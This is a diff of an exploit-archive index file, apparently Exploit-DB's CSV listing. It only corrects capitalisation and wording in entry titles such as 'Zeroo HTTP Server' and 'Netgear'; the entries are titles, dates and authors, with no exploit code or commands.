20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local,0 20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 -20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 +20461,platforms/windows/remote/20461.txt,"Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0 20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - (services.exe) Denial of Service",2012-08-12,loneferret,windows,dos,0 @@ -17815,7 +17818,7 @@ id,file,description,date,author,platform,type,port 20478,platforms/windows/webapps/20478.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0 20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote,0 -20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote,0 +20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl Exploit",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 20485,platforms/osx/local/20485.sh,"Viscosity OpenVPN Client (OSX) - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 @@ -17938,7 +17941,7 @@ id,file,description,date,author,platform,type,port 20605,platforms/windows/remote/20605.cpp,"Apple QuickTime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,windows,remote,0 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",cgi,remote,0 20607,platforms/windows/remote/20607.txt,"goahead WebServer 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote,0 -20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote,0 +20608,platforms/windows/remote/20608.txt,"Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote,0 20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 - Full Path Disclosure",2001-02-04,"Joe Testa",cgi,remote,0 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet - Denial of Service",2000-10-31,"Allaire Security",multiple,dos,0 20611,platforms/cgi/remote/20611.txt,"anaconda Foundation 1.4 < 1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote,0 @@ -17984,7 +17987,7 @@ id,file,description,date,author,platform,type,port 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 -20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote,0 +20657,platforms/windows/remote/20657.txt,"Robin Twombly A1 HTTP Server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote,0 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local,0 20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Arbitrary Command Execution",2001-02-14,"Marc Roessler",unix,remote,0 @@ -18120,7 +18123,7 @@ id,file,description,date,author,platform,type,port 20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",windows,dos,0 20803,platforms/windows/remote/20803.txt,"RaidenFTPd 2.1 - Directory Traversal",2001-04-25,joetesta,windows,remote,0 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage",2001-04-26,V9,irix,local,0 -20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon",1998-10-21,Rootshell,irix,remote,0 +20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon Exploit",1998-10-21,Rootshell,irix,remote,0 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,hardware,remote,0 20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal",2001-04-27,joetesta,multiple,remote,0 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal",2001-04-27,ThePike,cgi,remote,0 @@ -18141,7 +18144,7 @@ id,file,description,date,author,platform,type,port 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 -20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0 +20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0 @@ -19352,8 +19355,8 @@ id,file,description,date,author,platform,type,port 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 -22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0 -22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0 +22063,platforms/linux/remote/22063.c,"Zeroo HTTP Server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0 +22064,platforms/linux/remote/22064.pl,"Zeroo HTTP Server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 @@ -19685,7 +19688,7 @@ id,file,description,date,author,platform,type,port 22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 -22407,platforms/hardware/dos/22407.txt,"Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 +22407,platforms/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0 22409,platforms/multiple/remote/22409.txt,"Simple Chat 1.x - User Information Disclosure",2003-03-21,subj,multiple,remote,0 22410,platforms/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption",2003-03-21,rain_song,multiple,remote,0 @@ -20496,7 +20499,7 @@ id,file,description,date,author,platform,type,port 23231,platforms/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service",2003-10-07,"Luigi Auriemma",multiple,dos,0 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",php,webapps,0 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x - HTML Injection",2003-10-08,Jelmer,php,webapps,0 -23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos,0 +23234,platforms/windows/dos/23234.c,"Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 - Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos,0 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos,0 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo - Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0 23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 - admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 @@ -20573,7 +20576,7 @@ id,file,description,date,author,platform,type,port 23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow (2)",2003-10-27,d3ck4,linux,remote,0 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote,0 23308,platforms/linux/local/23308.c,"kpopup 0.9.x - Privileged Command Execution",2003-10-28,b0f,linux,local,0 -23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass 7.1 - HTTP Server Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0 +23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service",2003-10-29,Blademaster,php,dos,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0 @@ -20865,7 +20868,7 @@ id,file,description,date,author,platform,type,port 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0 -23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 +23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0 23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0 @@ -20906,7 +20909,7 @@ id,file,description,date,author,platform,type,port 23651,platforms/php/remote/23651.rb,"WordPress Plugin WP-Property - Arbitrary .PHP File Upload (Metasploit)",2012-12-25,Metasploit,php,remote,0 23652,platforms/php/remote/23652.rb,"WordPress Plugin Asset-Manager - Arbitrary .PHP File Upload (Metasploit)",2012-12-25,Metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 -23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 +23654,platforms/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0 @@ -20942,7 +20945,7 @@ id,file,description,date,author,platform,type,port 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion",2004-02-16,"intuit e.b.",windows,remote,0 -23701,platforms/windows/dos/23701.txt,"XLight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",windows,dos,0 +23701,platforms/windows/dos/23701.txt,"Xlight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",windows,dos,0 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0 23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - advSearch_h.asp Multiple Parameter SQL Injection",2004-02-16,"Nick Gudov",asp,webapps,0 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - Custva.asp redirectUrl Parameter Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0 @@ -20999,7 +21002,7 @@ id,file,description,date,author,platform,type,port 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos,0 23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos,0 -23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",windows,remote,0 +23758,platforms/windows/remote/23758.txt,"GWeb HTTP Server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",windows,remote,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0 23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,windows,dos,0 23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,windows,dos,0 @@ -22599,7 +22602,7 @@ id,file,description,date,author,platform,type,port 25415,platforms/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25417,platforms/ios/webapps/25417.txt,"File Lite 3.3 / 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 -25418,platforms/windows/dos/25418.py,"MiniWeb MiniWeb HTTP Server (build 300) - Crash (PoC)",2013-05-13,dmnt,windows,dos,0 +25418,platforms/windows/dos/25418.py,"MiniWeb HTTP Server (build 300) - Crash (PoC)",2013-05-13,dmnt,windows,dos,0 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0 25420,platforms/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0 @@ -23500,7 +23503,7 @@ id,file,description,date,author,platform,type,port 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps,0 26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 -26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 +26318,platforms/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - f p Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 @@ -23646,7 +23649,7 @@ id,file,description,date,author,platform,type,port 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 -26471,platforms/windows/remote/26471.py,"PCMan's FTP Server 2.0.7 - Buffer Overflow",2013-06-27,"Jacob Holcomb",windows,remote,21 +26471,platforms/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Buffer Overflow",2013-06-27,"Jacob Holcomb",windows,remote,21 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0 26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 @@ -23670,7 +23673,7 @@ id,file,description,date,author,platform,type,port 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0 26493,platforms/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote,0 26494,platforms/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote,0 -26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,windows,remote,0 +26495,platforms/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,windows,remote,0 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,windows,remote,0 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0 @@ -25606,7 +25609,7 @@ id,file,description,date,author,platform,type,port 28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,multiple,remote,0 28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 -28504,platforms/php/local/28504.php,"PHP 3-5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 +28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - QB_Path Parameter Multiple Remote File Inclusion",2006-12-27,Shell,php,webapps,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 @@ -25854,7 +25857,7 @@ id,file,description,date,author,platform,type,port 28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - admin/tax_classes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - admin/tax_rates.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - admin/zones.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28760,platforms/php/remote/28760.php,"PHP 3-5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0 +28760,platforms/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - Display.asp SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28763,platforms/windows/local/28763.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (1)",2006-08-26,"Ruben Santamarta ",windows,local,0 @@ -26197,7 +26200,7 @@ id,file,description,date,author,platform,type,port 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 +29096,platforms/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 @@ -26258,7 +26261,7 @@ id,file,description,date,author,platform,type,port 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - ticket.php email Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 -29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 +29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 @@ -26969,8 +26972,8 @@ id,file,description,date,author,platform,type,port 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 29801,platforms/php/local/29801.php,"PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 -29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 -29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos,0 +29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 +29803,platforms/windows/dos/29803.pl,"Static HTTP Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos,0 29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 @@ -26980,7 +26983,7 @@ id,file,description,date,author,platform,type,port 